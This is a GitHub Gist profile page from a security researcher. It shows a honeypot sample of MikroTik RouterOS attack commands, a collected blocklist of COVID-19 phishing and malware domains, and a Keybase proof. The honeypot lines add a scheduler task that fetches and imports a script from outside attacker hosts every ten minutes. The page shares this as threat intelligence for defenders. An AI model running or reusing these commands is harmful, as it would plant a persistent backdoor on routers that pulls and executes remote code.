Skip to content

Instantly share code, notes, and snippets.

@emilyaustin
emilyaustin / sus_input.sh
Last active April 16, 2021 20:57
Input sample from honeypot
/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://myfrance.xyz/poll/02758e86-50cc-4b0b-9883-aac79bf81c3c mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name=U6 interval=10m on-event=/tool fetch url=http://myfrance.xyz/poll/02758e86-50cc-4b0b-9883-aac79bf81c3c mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://bestony.club/poll/de37fb41-b5d7-41ea-b260-b74b10809683 mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name=U6 interval=10m on-event=/tool fetch url=http://bestony.club/poll/de37fb41-b5d7-41ea-b260-b74b10809683 mode=http dst-path=7wmp0b4s
@emilyaustin
emilyaustin / covid_ips_domains.txt
Last active March 30, 2020 11:38
Collection of COVID-19 related phishing and malware sites
COVID19 malicious IPs & Domains
Last updated 03/26/20, 7:05am ET
Note: I did not discover any of these myself and have not vetted them to see if they're still active. I'm just collecting them all for easier firewall/SIEM ingestion. Above each section, I've listed the source. I'll continue updating this as I find more feeds and sources. Most recent additions at the top.
### added 03/26/20
### https://exchange.xforce.ibmcloud.com/collection/6c7b18927ab1d2ed1f7a7be59c93f490
covid19google.com
covid19google.com

Keybase proof

I hereby claim:

  • I am emilyaustin on github.
  • I am emilyaustin (https://keybase.io/emilyaustin) on keybase.
  • I have a public key ASAr_jvEt60l7zs0lETzkQrNEpKUKMEBRX8wOSz3CeuNQwo

To claim this, I am signing this object: